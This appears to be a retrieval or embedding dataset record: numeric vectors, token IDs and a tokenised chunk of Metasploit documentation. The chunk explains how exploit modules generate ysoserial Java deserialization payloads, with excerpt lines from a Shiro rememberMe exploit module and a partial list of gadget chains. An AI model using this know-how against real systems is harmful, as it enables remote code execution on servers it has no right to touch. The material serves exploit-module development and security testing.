-0.753932535648346, 0.07970743626356125, -0.35345458984375, 0.26784878969192505, -0.1515040397644043, 0.34015485644340515, 0.18470777571201324, 0.5594507455825806, 0.006629066541790962, -0.44845765829086304, -0.08487440645694733, 0.7047765254974365, -1.0553507804870605, 0.10874432325363159, 0.26337364315986633, 0.34997349977493286, -0.08816314488649368, 0.6090710759162903, 0.0696209967136383, 0.04263971373438835, 0.67889803647995, -0.022713206708431244, -0.6669216752052307, -0.18547099828720093, -0.21484427154064178, -0.16411688923835754, 0.05777494236826897, 0.07304199039936066, -0.24738933145999908, -0.7527642250061035, 0.7688045501708984, 0.29517123103141785, -0.6564136743545532, 0.2674294114112854, -0.35600975155830383, 0.12485166639089584, 0.09326855093240738, -0.3453204035758972, 0.41700586676597595, -0.3807097375392914, -0.051025211811065674, 0.9450457692146301, -0.2574221193790436, -0.3681139051914215, -0.18361519277095795, -0.6984356045722961, -0.588240385055542, 0.644117534160614, 0.26189306378364563, 0.41781529784202576, -0.7195966243743896, -0.03346585854887962, 0.4821023941040039, -0.37492498755455017, -0.5001707673072815, -0.08687935024499893, 0.23410743474960327, -0.24512584507465363, -0.06677182018756866, -1.064885139465332, 0.5005191564559937, -0.20841990411281586, 0.4151078760623932, -0.2310982048511505, 0.38622596859931946, -0.45165032148361206, -0.5050258040428162, 0.11677887290716171, 0.8196991086006165, 0.27882152795791626, -1.0793347358703613, 0.01164301112294197, 0.4631690979003906, -0.4095040559768677, 0.828480064868927, 0.07059814780950546, -0.3061225414276123, -0.42467740178108215, 0.04571421444416046, 0.4676295220851898, 0.006565399002283812, -0.04761623963713646, -0.3867882192134857, -0.7677068114280701, -0.8431758284568787, 0.5519922971725464, 0.5517483353614807, -1.0518866777420044, 0.00628335727378726, -0.5771840214729309, -0.13706602156162262, -0.5560013651847839, -0.35266193747520447, 0.39233219623565674, -0.919015645980835, 0.4194735884666443, 0.7574466466903687, -0.3525233864784241, 0.21631629765033722, -0.1952901929616928, -0.042376693338155746, 1.0045039653778076, 0.017919011414051056, -0.6677382588386536, -0.5844668745994568, 0.06818212568759918, -0.009425009600818157, -0.3127047121524811, 0.4935178756713867, -0.4149549901485443, -0.16684097051620483, -0.15336279571056366, -0.18947657942771912, -0.46868833899497986, 0.2502908408641815, -0.5057463049888611, 0.22398371994495392, 0.5095432996749878, -0.4370996952056885, 0.3839462995529175, -0.06527084857225418, 0.4692293107509613, -0.2514108717441559, 0.6895095109939575, -0.036433275789022446, -0.01849944517016411, -0.8623182773590088, -0.6067585349082947, 0.8653488755226135, 0.24293339252471924, -0.5866733193397522, 0.6687076687812805, -0.21960236132144928, 0.6024244427680969, -0.923044741153717, 0.5433575510978699, 0.6655113101005554, 0.28534188866615295, 0.03656579181551933, -1.1721166372299194, 0.1842261254787445, 0.6063695549964905, -0.4159770607948303, -0.20138931274414062, 0.40178969502449036, 0.17937113344669342, -0.6023196578025818, -0.2554442286491394, -0.37016355991363525, -0.35452061891555786, -0.09611842781305313, 0.6676616668701172, -0.3693452775478363, 0.7828682661056519, 0.16225819289684296, -1.145907998085022, -0.2856426537036896, -0.2283017337322235, 0.7634322047233582, 0.19641447067260742, 0.24025018513202667, 0.41176533699035645, 0.7412666082382202, 0.06689232587814331, -0.8706144690513611, -0.8801630139350891, -0.6361548900604248, 0.4857829809188843, 0.21260955929756165, -0.09802810102701187, 0.08886796236038208, 0.23751699924468994, -0.10866594314575195, -1.0261362791061401, -0.23833055794239044, -0.22510795295238495, -0.24875469505786896, -0.16602756083011627, -0.5624637603759766, -0.8713293075561523, -0.04229586571455002, -0.5995365381240845, -0.1286337524652481, 0.22469791769981384, -0.19632087647914886, -0.7048450112342834, 0.27893245220184326, -0.19890490174293518, 0.5306320786476135, 0.5346820950508118, 0.17178180813789368, -0.30732959508895874, -0.541645348072052, -0.6271016001701355, -0.34215375781059265, 0.17563851177692413, 0.5917291641235352, 0.9160152077674866, 0.7797569632530212, 0.11844266206026077, -0.20115937292575836, 1.3698554039001465, -0.2082124799489975, 0.6422724723815918, 0.6347870826721191, -0.926817774772644, -0.9483150243759155, -0.24494138360023499, -0.004823694936931133, 0.4345066249370575, 0.16078972816467285, 0.21413077414035797, 0.5222564935684204, 1.1018157005310059, 0.16336585581302643, 0.1822967231273651, -0.9578332901000977, 0.11727166175842285, -1.1457459926605225, -0.39920902252197266, -0.4997834861278534, 0.07509401440620422, 0.2904593348503113, -0.1797323375940323, -0.5080016255378723, 0.20041711628437042, -1.0129709243774414, 0.4315512478351593, -0.5008311867713928, -0.2096826583147049, -0.13457271456718445, 0.07268120348453522, 0.1420922428369522, -1.0169130563735962, -0.40156230330467224, -0.803452730178833, 0.10650443285703659, -0.6610286831855774, 0.6955928206443787, -0.21566739678382874, -0.23688429594039917, 0.3981468081474304, 0.831397294998169, -0.596445620059967, -0.6824896335601807, -0.31529736518859863, -0.13008242845535278, 0.3220803141593933, -0.38756847381591797, 0.47205305099487305, 0.6813932061195374, -1.1312272548675537, 0.7155399322509766, 0.6059043407440186, 0.48213693499565125, 0.11159441620111465, 0.6374759674072266, 0.5842821598052979, -0.6441105008125305, -0.232094869017601, -0.3453873097896576, -0.46571215987205505, 0.08363796770572662, 0.6268041133880615, -0.2992549240589142, 0.46967944502830505, 0.381659597158432, -0.12506407499313354, -0.17872746288776398, 0.07235445082187653, 0.40279749035835266, 0.674784779548645, 0.46181178092956543, 0.7435917258262634, 0.7331683039665222, 0.3475247323513031, 0.15616671741008759, -0.04239720106124878, 0.3056487441062927, -0.45464956760406494, 0.44631054997444153, -0.10388781875371933, 0.23784282803535461, 0.317088782787323, -0.8156087398529053, -0.7546566128730774, -0.2884647846221924, -0.4036572575569153, -0.8306289911270142, 0.48220470547676086, -0.193837970495224, 0.3659681975841522, 0.07040462642908096, 0.13122586905956268, -0.061529792845249176, 0.11573855578899384, -1.1668425798416138, 0.03019794635474682, 0.6889542937278748, -0.5523810386657715, 0.47953635454177856, 0.09899000078439713, -0.0779559537768364, -0.6976319551467896, 0.20513436198234558, -0.37499794363975525, -0.038118861615657806, 0.8361750841140747, 1.0002511739730835, 1.0188325643539429, -0.37853777408599854, 0.04364731162786484, 0.09975852817296982, 0.48220744729042053, -0.46949151158332825, -0.7067216038703918, -0.36293062567710876, 1.5133817195892334, -0.29957422614097595, 0.31087979674339294, -0.22089701890945435, -0.2805007994174957, 0.37162458896636963, 1.0152477025985718, 0.13663648068904877, -0.2822866141796112, -0.3528062701225281, 0.7180144190788269, -0.5935554504394531, 0.6429769992828369, -0.27694764733314514, 0.2711288332939148, -0.008590159006416798, 0.30664318799972534, -0.21288874745368958, 0.6750612854957581, 0.27266740798950195, 0.06345231086015701, 0.44631996750831604, 1.2160722017288208, 0.40324777364730835, -0.16559286415576935, -0.16360731422901154, -0.08123889565467834, 0.4056823253631592, 0.09640681743621826, 0.7798071503639221, -0.2059904932975769, 0.1163509264588356, 0.3381459414958954, -0.8475127220153809, -0.3408932685852051, 0.5591036081314087, 0.06637254357337952, -0.5883023738861084, 0.09498593956232071, -0.6158596873283386, -0.09079646319150925, -0.0994873195886612, 0.02685207687318325, 0.5058411955833435, -0.8716745972633362, -0.09119471162557602, -0.3211382031440735, 0.0234554260969162, 0.8017357587814331, -0.26914748549461365, 0.03428502008318901, 0.45521262288093567, -0.29500624537467957, 1.309505820274353, 0.6082887649536133, -0.32789692282676697, -0.033315084874629974, 0.837593138217926, 0.4153052270412445, -0.43766456842422485, 0.2416890412569046, 0.3886507451534271, 0.6905263662338257, -0.14674913883209229, 0.04709997773170471, -0.44112101197242737, 0.11100324243307114, 0.15357713401317596, 0.46511831879615784, -0.9534628391265869, 0.06851419806480408, 0.3735014498233795, 0.6098693609237671, -0.13707014918327332, -0.5599573850631714, -0.043379247188568115, -0.6299648880958557, 0.05853349342942238, -0.923714816570282, -0.2820390462875366, 0.448553204536438, -0.23616741597652435, 0.1265018731355667, 0.6156207919120789, -0.020243827253580093, 0.2040138989686966, -0.19077807664871216, 0.8999850153923035, 0.5747584700584412, 0.6641926169395447, 0.6918805837631226, 0.12033256143331528, -0.17764204740524292, 0.20590871572494507, -0.5003253817558289, -0.056217655539512634, -0.4510136544704437, -0.79982590675354, 0.13557016849517822, -0.7135596871376038, -0.482162743806839, -0.06898818910121918, 0.5827744603157043, 0.13841548562049866, -0.7081146240234375, 0.3027724027633667, 0.22693118453025818, -0.6202928423881531, -0.49753043055534363, 0.943975567817688, 0.2718240022659302, 0.5111714601516724, -0.6577005982398987, -0.40770113468170166, -0.12265031039714813, -0.5832855701446533, -1.0139089822769165, -0.19168157875537872, -0.4636150598526001, -0.17307603359222412, -0.23441936075687408, -0.2672825753688812, 0.0780288353562355, -0.21212336421012878, -0.5785924792289734, 0.656509518623352, 0.14712980389595032, 0.3593388795852661, 0.2527984082698822, 0.2796681225299835, 0.06529446691274643, -0.23773561418056488, 0.9564002156257629, 0.4859485328197479, -0.445904016494751, 1.0190809965133667, 0.12142781168222427, -0.4957219064235687, -0.2548280358314514, -0.047014299780130386, -0.26946139335632324, -0.7543432116508484, -0.4516444206237793, -0.545626699924469, 0.609502911567688, -1.3227277994155884, -0.7477577328681946, 0.061515532433986664, 0.679589033126831, 0.41011831164360046, -0.20131747424602509, -0.760344386100769, -0.01681881584227085, -1.1517579555511475, -0.7251095771789551, -0.3230682909488678, -0.5763586759567261, -0.4766789376735687, -0.24517956376075745, -0.4615998864173889, -0.47625482082366943, 4.234678745269775, 0.05375700443983078, 0.2643536329269409, 0.12007620185613632, 0.3629918098449707, 0.8766599297523499, 0.40438154339790344, -0.6596124172210693, -0.0768398568034172, -0.6075407862663269, 0.37201061844825745, -0.22384300827980042, 0.27658525109291077, 0.40003082156181335, 0.11090421676635742, 0.4923999011516571, -0.4652218222618103, -0.2545798718929291, 0.946010410785675, -0.9124473929405212, -1.068335771560669, 0.025617726147174835, -0.1454516500234604, 0.8422391414642334, -0.045278191566467285, 0.5558578372001648, 0.19910578429698944, 0.11535027623176575, 0.3452945649623871, -0.11621732264757156, -0.03366641700267792, -0.07766425609588623, 1.58903968334198, -0.02352096140384674, -0.7421227097511292, 0.23736785352230072, -0.00026681629242375493, -0.2853103280067444, 0.19750122725963593, -0.6742072701454163, 0.037164751440286636, 0.44773799180984497, 0.10158735513687134, -0.09162493050098419, -0.4388546347618103, 0.42287778854370117, 0.015632953494787216, -0.05598653480410576, 0.7285014390945435, -0.45648685097694397, 1.2368327379226685, -0.447591096162796, 0.121561199426651, -0.5595608949661255, -1.1066750288009644, 0.6333955526351929, -0.0649879053235054, 0.3250919580459595, -0.1431073099374771, 0.12412365525960922, 0.5311041474342346, 0.16891397535800934, -0.14893411099910736, -0.24676814675331116, 0.11967357248067856, 0.4390430450439453, 0.4090627431869507, 0.17279984056949615, -0.5528725981712341, -0.6455714702606201, -0.4760763943195343, -0.11135033518075943, -0.16582538187503815, -0.5720731616020203, 0.15940837562084198, 0.8092036247253418, 0.3298232853412628, 0.6146903038024902, -0.573101282119751, -0.2861757278442383, 0.4874570369720459, -0.5019735097885132, -0.29201626777648926, 0.27039018273353577, 0.24237389862537384, 0.4229445457458496, -0.47202229499816895, -0.3221403658390045, -0.7038301229476929, 0.24899938702583313, 0.15121504664421082, 0.8420319557189941, -0.5044276714324951, 0.7553243637084961, 0.5587637424468994 ]
[ 2000, 8116, 3128, 18093, 2015, 2107, 2004, 8316, 28139, 3334, 1012, 2129, 2000, 2224, 3094, 2754, 2869, 14406, 2000, 2224, 4204, 18223, 1999, 2019, 18077, 102 ]
metasploit
132.txt
2
[CLS] instead of embedding static java serialized objects, metasploit offers ysoserial - generated binaries with built - in randomization. the benefits of using the metasploit library include quicker module development, easier - to - read code, and future - proof java serialized objects. to use the ysoserial libraries, let ’ s look at an example from the shiro _ rememberme _ v124 _ deserialize module : example codein this example : ( l11 ) the module includes the msf : : exploit : : javadeserialization mixin. this exposes the necessary methods. ( l79 ) then it uses the generate _ java _ deserialization _ for _ payload method to create a serialized java object based on the commonscollections2 ysoserial payload that will execute the metasploit payload. note that the metasploit payload object is passed as - is, without any conversion. 09 include msf : : exploit : : remote : : httpclient 10 include msf : : exploit : : powershell 11 include msf : : exploit : : javadeserialization 12 13 def initialize ( info = { } )... 78 def exploit 79 java _ payload = generate _ java _ deserialization _ for _ payload ('commonscollections2 ', payload ) 80 ciphertext = aes _ encrypt ( java _ payload ) once the serialized object is generated and stored as java _ payload, it ’ s then sent to the target in an exploit - specific manner. methods # generate _ java _ deserialization _ for _ payload ( name, payload ) this method will generate a serialized java object that when loaded will execute the specified metasploit payload. the payload will be converted to an operating system command using one of the supported techniques contained within this method and then passed to # generate _ java _ deserialization _ for _ command. name - the payload name parameter must be one of the supported payloads stored in the ysoserial cache. as of this writing, the list includes : beanshelll1, clogure, commonsbeanutils1, commonscollections2, commonscollections3, commonscollections4, commonscollections5, commonscollections6, groovy1, hibernate1, jbossinterceptors1, jrmpclient, json1, javassistwe
[ 0.13274110853672028, -1.0350141525268555, -0.38027694821357727, 0.3695456385612488, 0.28745037317276, -0.31275415420532227, -0.687011182308197, 0.04603187367320061, 0.7332238554954529, 0.4800342321395874, 0.6242334842681885, -0.6284165382385254, 0.21859031915664673, -0.377106636762619, -0.5678269267082214, -0.9129824638366699, -0.22219006717205048, 0.0819268524646759, -0.944252610206604, -0.37307533621788025, 0.24959619343280792, 0.10313741117715836, -0.35240820050239563, -0.6075668931007385, -0.25874415040016174, 0.8916943073272705, 0.39020946621894836, -0.12706471979618073, 0.4522698223590851, 0.3623366951942444, 0.03723277151584625, 0.25738319754600525, -0.06652660667896271, -1.048514485359192, 0.5933052897453308, -0.15911512076854706, 0.9104279279708862, -0.2897704541683197, 0.3045963943004608, -0.7373848557472229, 0.9928287863731384, -0.08190035820007324, -0.24841426312923431, -0.464794397354126, -0.7109825611114502, 0.03444144129753113, 0.3242872655391693, -0.6751562356948853, 0.6010674834251404, 0.015003638342022896, 0.8776566982269287, 0.09595230221748352, 0.1406002640724182, 0.574638843536377, 0.513656497001648, -0.13733816146850586, -0.06325943022966385, 0.43984320759773254, -0.11648018658161163, -0.12028086185455322, -0.23465269804000854, 0.7963260412216187, 0.008611411787569523, -0.9855005741119385, -0.32992154359817505, 0.6645556092262268, 0.05190637335181236, 0.17730283737182617, -0.27417582273483276, -0.2011336237192154, 0.15183715522289276, 0.6292441487312317, -0.21867573261260986, -0.2606305181980133, -0.4325040578842163, 0.04847172275185585, 0.2441108226776123, 0.019728785380721092, 0.19572991132736206, 0.2816067636013031, -0.14305861294269562, 0.9684556126594543, 0.5011557936668396, -0.21068011224269867, -0.26151978969573975, -0.6750391125679016, 0.44305288791656494, 0.3739118278026581, -0.597743809223175, 0.10083401203155518, 0.15824024379253387, 0.6472774744033813, -0.545196533203125, -0.054143719375133514, 0.4931834638118744, -0.01145685464143753, -0.1084124967455864, -0.014502990990877151, -0.04947657883167267, 0.07803089916706085, 0.8784730434417725, 0.5180420875549316, 0.04079233109951019, 0.4795718491077423, -0.37590843439102173, 0.5161092281341553, 0.7997217178344727, -0.08625301718711853, -0.5001561045646667, -0.3692252039909363, 0.5665844082832336, 0.06392006576061249, 0.15784437954425812, -0.7513903379440308, 0.1128213033080101, 0.8665747046470642, 0.5673150420188904, 0.14367660880088806, -0.09137901663780212, -0.1268310248851776, -0.6052948832511902, -0.2942503094673157, -0.16816703975200653, -0.1941337138414383, 0.23493221402168274, -0.23731419444084167, 0.5180118680000305, 0.6338335871696472, -0.6538845896720886, -0.45734745264053345, 0.04691137745976448, -0.03660256788134575, 0.3602882921695709, 1.0436078310012817, -0.501676082611084, 0.08881071954965591, 0.347290962934494, -0.0006508941296488047, 0.9336209297180176, -1.15198814868927, -0.2601287364959717, -0.047582898288965225, 0.586398184299469, 1.365262746810913, 0.09898517280817032, -0.5030926465988159, -0.47308361530303955, -0.18326249718666077, -0.749959409236908, 0.51788729429245, -0.2349657267332077, -0.3754865825176239, 1.1291532516479492, -0.047458671033382416, -0.2396988719701767, -0.1846647709608078, -0.5408327579498291, 0.5727915167808533, 0.1593586504459381, -0.6634069681167603, -0.21961477398872375, 0.5040834546089172, -0.18811042606830597, 0.37556859850883484, -0.3000914752483368, 0.34725266695022583, -0.5134100317955017, -0.6516599059104919, -0.6264707446098328, -0.281271755695343, 0.2227526605129242, 0.05203908309340477, -0.07796871662139893, 0.20392923057079315, 1.0203768014907837, 0.07540536671876907, -0.27287614345550537, -0.09443078190088272, 0.05357849597930908, 0.3845480978488922, -0.40798476338386536, 0.27380943298339844, 0.15102240443229675, 1.250386357307434, -0.3790699541568756, 0.2584742307662964, -0.4365346431732178, -0.38765543699264526, -0.3052593469619751, 0.26176244020462036, 0.20446407794952393, 0.884442925453186, -0.3914254903793335, 0.5457497835159302, 0.5922306180000305, 0.821871280670166, -0.9885845184326172, -0.2509540319442749, -0.4093754291534424, -0.893972635269165, -0.35832908749580383, 0.525628387928009, -0.4506053030490875, 0.3845418095588684, -0.727321207523346, -0.4915023148059845, 1.127915382385254, 1.058761477470398, -0.4552672803401947, 1.0378227233886719, 0.4290989935398102, -0.36293551325798035, -0.17327003180980682, -0.009602879174053669, -0.22752419114112854, -0.11108721792697906, -0.8141353726387024, 0.511360764503479, -0.404489666223526, 0.2919430136680603, -0.5673844218254089, 0.3205379843711853, 0.2814118564128876, 0.22024956345558167, -0.16508296132087708, -0.3476119935512543, 0.44032323360443115, 0.5385148525238037, -0.20432886481285095, -0.04480097442865372, 0.5876963138580322, 0.4051390588283539, 0.8563838005065918, 0.8540412783622742, 0.13798023760318756, 0.03276075795292854, 0.4823667109012604, 0.3105469048023224, 0.08446958661079407, -0.2977113425731659, 0.09658613055944443, 0.8400854468345642, 0.28776463866233826, 0.7459104657173157, 0.4510209560394287, 0.4544673264026642, -0.2362878918647766, 0.1491202712059021, 0.17449823021888733, 0.31862300634384155, -0.3524529039859772, 0.3680092990398407, 0.1406548023223877, -0.13022400438785553, -1.1578528881072998, -0.8355291485786438, 0.06108647584915161, 0.6849598288536072, -0.3557637631893158, -1.515677571296692, 0.07746582478284836, 0.20150503516197205, -0.11864935606718063, -0.5299116373062134, 0.029980234801769257, 0.31217673420906067, -0.09837986528873444, -0.21605810523033142, -0.2669723927974701, -1.1109281778335571, -0.8627663254737854, -0.4846940338611603, -0.691255509853363, -0.34832945466041565, -0.7615599632263184, 0.05538046732544899, -0.3318388760089874, -1.0241907835006714, 0.29123035073280334, 0.23061582446098328, -0.628315806388855, 0.4586678147315979, -0.22973686456680298, 0.45162004232406616, -0.12567053735256195, -0.27653804421424866, -0.3446652293205261, 0.2018166184425354, -0.03394915908575058, 0.6958711743354797, -0.10142748057842255, -0.5331791639328003, -0.22959397733211517, -0.4816230833530426, 0.24329720437526703, 0.1854449361562729, 0.7664918303489685, -0.2455323040485382, 0.6992373466491699, -0.21932624280452728, 0.22274941205978394, -0.2815098464488983, 0.32051882147789, 0.2834964990615845, -0.5293101668357849, 0.755211353302002, -0.10188297182321548, 0.06832785904407501, 0.49579334259033203, 0.722811758518219, -1.1381601095199585, 0.4203875660896301, 0.04144328087568283, 0.3146786093711853, -0.6398888826370239, 0.953637957572937, -0.010867663659155369, -0.030130498111248016, 0.4787342846393585, -0.2714667320251465, -0.18558230996131897, -0.3561428487300873, -0.5185089111328125, -0.042764440178871155, -0.5685188174247742, 0.6346185207366943, 0.037777990102767944, -0.5301485061645508, 0.47073742747306824, -0.06768599152565002, -0.3042360544204712, 0.549412190914154, -0.10395193845033646, 1.2793420553207397, 0.15250098705291748, 0.43463364243507385, -0.5538928508758545, -0.008833112195134163, -0.08333639055490494, 0.133584663271904, 0.19658419489860535, -0.19760414958000183, 0.2909379005432129, 0.43517690896987915, -0.08262309432029724, 0.4942834675312042, 1.1411006450653076, -0.3505787253379822, -0.2851063907146454, -0.008230234496295452, -0.8064899444580078, -0.35875439643859863, 0.22506016492843628, -0.16548043489456177, -0.24416299164295197, 0.7393985986709595, -0.4924769103527069, -0.5014190077781677, 0.28133466839790344, -0.39782118797302246, 0.25522488355636597, 0.21891818940639496, 0.08294429630041122, -0.17205065488815308, -0.33786940574645996, -0.7016130685806274, -0.1250380575656891, 0.11437627673149109, 0.21804314851760864, -0.5145776271820068, 0.46961691975593567, -0.2986532747745514, -0.26703572273254395, 0.6748121380805969, 0.015772012993693352, -0.8110339641571045, 0.6806991696357727, -0.13645465672016144, 0.49414125084877014, -0.4962764382362366, 0.26437878608703613, 0.3751310110092163, 0.38373279571533203, 0.4066038131713867, 0.026968415826559067, -0.3256422281265259, -0.19548434019088745, -0.3078088164329529, -0.05246179178357124, -0.9505497217178345, 0.1095401868224144, -0.03529681637883186, 0.5492203831672668, -0.30569151043891907, -0.9102053046226501, 0.15245762467384338, 0.9865787625312805, 1.035697102546692, -0.21507245302200317, 0.22975976765155792, 1.0734927654266357, 0.6409801244735718, -0.3086419403553009, 0.18583957850933075, -0.5012724995613098, 0.11775849759578705, 0.48830029368400574, 0.479054719209671, -0.058056872338056564, -0.20877116918563843, 0.19872456789016724, -0.24891866743564606, -0.6074047684669495, -0.44097673892974854, 0.3558904230594635, 0.018188713118433952, -0.512566864490509, 0.15084700286388397, 0.809893786907196, 0.3110108971595764, 0.13458269834518433, 0.22636006772518158, -0.3667886555194855, 0.45048782229423523, 0.681000828742981, -0.6896815896034241, -0.5113111734390259, -0.6726272702217102, -0.28242820501327515, 0.008549331687390804, 0.6162602305412292, -0.22302383184432983, -0.8028451204299927, -0.3475194275379181, -0.3208417296409607, 0.08275388181209564, 0.42617514729499817, 0.5500242114067078, 0.06336309015750885, -0.8281420469284058, 0.5548717975616455, 0.6426030993461609, -0.5422958731651306, -0.10057459026575089, -0.04015613719820976, 0.18762746453285217, 0.15552157163619995, 0.31531670689582825, -0.5167247653007507, -0.2392546385526657, 0.12157630175352097, -0.5549034476280212, 0.2867290675640106, -1.1139452457427979, 0.7662116885185242, 0.3869500160217285, -0.4167848229408264, -0.0753367692232132, 0.3130092918872833, -0.31360769271850586, -0.18716365098953247, -0.6881487965583801, 0.5257005095481873, -0.6525057554244995, -0.24730421602725983, 0.7682780623435974, 0.5636239647865295, -0.05959846451878548, 0.5226999521255493, 0.8045080304145813, -0.1538286954164505, -0.1448637843132019, -0.7062817215919495, -0.3813861012458801, 0.45816919207572937, -0.7483476400375366, 0.5178070664405823, 0.09976708143949509, 0.045512568205595016, 0.007528325542807579, -0.7172825932502747, 0.9321953058242798, -0.2710559666156769, -0.49927598237991333, -0.708471953868866, -0.33746078610420227, 0.00415327912196517, 0.8160702586174011, 0.2083916813135147, 0.42568910121917725, 0.07888808846473694, -0.6619086265563965, 0.1118408590555191, 0.5942384600639343, -0.5782760977745056, -0.9364484548568726, 0.2850334644317627, -0.2423705905675888, 0.15859799087047577, 0.161417618393898, 0.6067403554916382, -0.007480935659259558, -0.5549452304840088, 0.3724936544895172, -0.33914175629615784, 0.08410260081291199, -0.31631729006767273, 0.5256273746490479, -1.2772600650787354, -0.40803760290145874, 0.2235877364873886, -0.20225059986114502, -0.58290696144104, -0.014933643862605095, 0.16724763810634613, 0.5631630420684814, 0.20062251389026642, -0.47855377197265625, -0.7321004867553711, 0.6986741423606873, 0.16781654953956604, -0.475523978471756, 0.2161369025707245, 0.6671702265739441, -0.7746767401695251, 0.22598256170749664, -0.10913246870040894, -0.6927887201309204, -0.7742329835891724, -0.5092445015907288, 0.29758721590042114, -0.3036177158355713, 0.18548308312892914, -0.6578720808029175, -0.4989657402038574, 0.1301819086074829, 0.63863605260849, -0.21229511499404907, -0.7864527702331543, -0.2855864465236664, 0.09943164885044098, 0.6827669143676758, 0.2318050116300583, -0.14954134821891785, -0.9322237968444824, -0.6543841361999512, -0.6377624273300171, 1.007367491722107, 0.0987471267580986, -0.1700310856103897, 0.383067786693573, -0.15815003216266632, 0.6082138419151306, 0.26409098505973816, -0.36496245861053467, -0.19126065075397491, 0.28305619955062866, -0.5472325086593628, -0.07308220118284225, 0.2861011326313019, -0.5911741256713867, -0.1786673218011856, -0.3464896082878113, 0.07543408125638962, 0.052514635026454926, -0.2736758887767792, -0.43175533413887024, 0.19753412902355194, 0.8320117592811584, -0.4101922810077667, -0.1544540971517563, -0.5121338367462158, 0.5398895740509033, 0.17881803214550018, -0.2278885394334793, -0.9943686723709106, 0.10936955362558365, -0.145341694355011, -1.3487651348114014, 0.9393162131309509, -0.17853376269340515, -0.598353385925293, -0.15638001263141632, -0.02707328088581562, 0.2596849203109741, -0.8951302766799927, 0.002044287044554949, 0.3746706545352936, 0.3250077962875366, 0.17327603697776794, -0.7284000515937805, 0.2422587126493454, 0.05238260328769684, -0.39996999502182007, 0.3037664294242859, 0.07283351570367813, -0.319659948348999, -0.23085854947566986, -0.19788481295108795, -0.7533845901489258, -0.9125480055809021, 0.13159233331680298, 0.403637558221817, -0.5324838161468506, 0.41311541199684143, 0.22511537373065948, -0.13616172969341278, -0.10648675262928009, -0.3761028051376343, -0.2079545259475708, -0.06836721301078796, 0.5578378438949585, 0.33123716711997986, 0.08355620503425598, -0.303329199552536, -0.028194431215524673, -0.529600977897644, -0.48744916915893555, 0.9408749938011169, 0.34815534949302673, -0.538127064704895, 0.859185516834259, 0.37480998039245605, -0.828481137752533, -0.45972973108291626, -1.2048993110656738, -0.3179555833339691, 0.08971358090639114, -0.21036399900913239, -0.9281838536262512, 0.3460729420185089, -0.2639859914779663, 0.12339599430561066, 0.5638315677642822, 0.2313779890537262, -0.20542867481708527, -0.1642594039440155, 0.45540714263916016, 0.1377807855606079, 0.636508584022522, 1.0005911588668823, -0.7429279088973999, -0.41268375515937805, -0.7206029891967773, -0.6003656387329102, 0.28589463233947754, -0.02017282322049141, 0.7470856308937073, -0.0439758226275444, 0.4444155991077423, -0.006996071431785822, 0.16095994412899017, 1.2850099802017212, -0.3047270178794861, 0.9035205841064453, 0.6214562058448792, -0.321989506483078, -0.6883593797683716, -0.5238677263259888, 0.04584969952702522, -0.1169489175081253, -0.039141952991485596, -0.4530284106731415, -0.27293524146080017, -0.5503343343734741, 0.25910094380378723, -0.4308297336101532, -0.48400843143463135, -0.9118934273719788, -1.118322491645813, -0.20446570217609406, -0.3726395070552826, -0.02518192119896412, -0.5212602019309998, 0.5339289903640747, -0.702673077583313, 0.035065919160842896, -0.5648776888847351, 0.7826710939407349, -0.15130281448364258, 0.15327875316143036, -0.3522970378398895, -0.02184542641043663, -0.42986348271369934, -0.0971631407737732, -0.10416034609079361, -0.5201871395111084, -0.20870321989059448, -0.6095237731933594, -0.18155187368392944, -0.0040770587511360645, -1.2878936529159546, 0.6619638204574585, -0.29716840386390686, 0.384095698595047, -0.052997879683971405, -0.3122998774051666, -0.3200646638870239, 0.3866797983646393, -0.5129479765892029, 0.15827593207359314, -0.018541041761636734, -0.18261559307575226, 0.09399484097957611, -0.4192439317703247, -0.7325307130813599, 0.18911699950695038, 0.5533220767974854, 0.04427772015333176, 0.7666844725608826, -0.5343849062919617, 0.10020262002944946, 0.6586494445800781, -0.7313715815544128, -0.8131454586982727, -0.941148042678833, 0.3777531385421753, 0.47086101770401, 0.06442295759916306, 0.6731220483779907, 1.215561032295227, 0.1745026558637619, 0.19168886542320251, -0.40216657519340515, 1.077518343925476, 0.6488767862319946, 0.40913456678390503, 0.10839547216892242, -0.12190303206443787, 0.3917389512062073, -0.5505194664001465, 0.24630381166934967, -0.01993154175579548, -0.29754137992858887, 0.6136402487754822, 0.3668699264526367, -0.11372660100460052, -0.045471806079149246, 0.31241482496261597, -0.2617093026638031, -0.041701916605234146, 0.6888535022735596, -0.1579781025648117, 0.542849063873291, -0.5949178338050842, -0.34347042441368103, -0.34482207894325256, -0.2688748240470886, -0.26958438754081726, 0.024897513911128044, -0.1911177635192871, -0.1507590115070343, -0.4080425798892975, 0.1723054051399231, -0.15680520236492157, -0.5443832874298096, 0.31339138746261597, 0.4433594048023224, -0.41919049620628357, -0.4406895935535431, 1.156662106513977, -0.32575899362564087, -0.9315460324287415, -0.4489976763725281, 0.4885012209415436, -1.0067213773727417, -1.2066097259521484, -0.22028395533561707, 0.8735761046409607, 0.16522711515426636, -0.16979371011257172, -0.08885344117879868, 0.21155300736427307, 0.27557072043418884, 0.5807672142982483, -0.1481630802154541, -0.3319055736064911, -0.4078006148338318, 0.45416027307510376, -0.18562470376491547, 0.2093220055103302, 0.24466267228126526, -0.06387477368116379, -0.01834559254348278, 0.05247855931520462, -0.6866568326950073, 0.5283374190330505, -0.029647555202245712, 0.8550323247909546, 0.6087597608566284, 0.49168023467063904, 0.2689770460128784, -0.45236751437187195, -0.16595301032066345, -0.3954772651195526, 0.054464191198349, 0.11402449756860733, 1.0197697877883911, 0.23380278050899506, 0.3597504496574402, 0.8580793142318726, -0.8800069689750671, -0.4985896050930023, 0.8214700818061829, -0.2717939019203186, 0.13420040905475616, 0.27527961134910583, 0.015991616994142532, 0.37327656149864197, 0.6468682885169983, -0.3296658992767334, 0.31592604517936707, -0.0396648570895195, -0.2026565670967102, -0.22463278472423553, -0.14161206781864166, 0.7235491275787354, -0.8854959607124329, 0.38590359687805176, -0.6683599948883057, -0.3772600591182709, 0.6645061373710632, 0.25391632318496704, -0.955579936504364, 0.3003445267677307, 0.894023060798645, 0.04919133707880974, -0.8117213845252991, 0.5077110528945923, -0.3558260500431061, 0.4504649043083191, 0.13344335556030273, 0.08898063749074936, -0.7078765630722046, 0.4036000967025757, 0.13299383223056793, -0.9413397312164307, -0.7952733635902405, -0.03023475408554077, 0.5058956742286682, -0.06383660435676575, 0.37536901235580444, -0.5596073269844055, -0.1987002044916153, -0.5023641586303711, 0.29920104146003723, -0.9326929450035095, -0.47483956813812256, 0.3580416142940521, 0.13341587781906128, 0.2572433650493622, 0.6355860829353333, -0.060789939016103745, 1.0542811155319214, 0.17044439911842346, 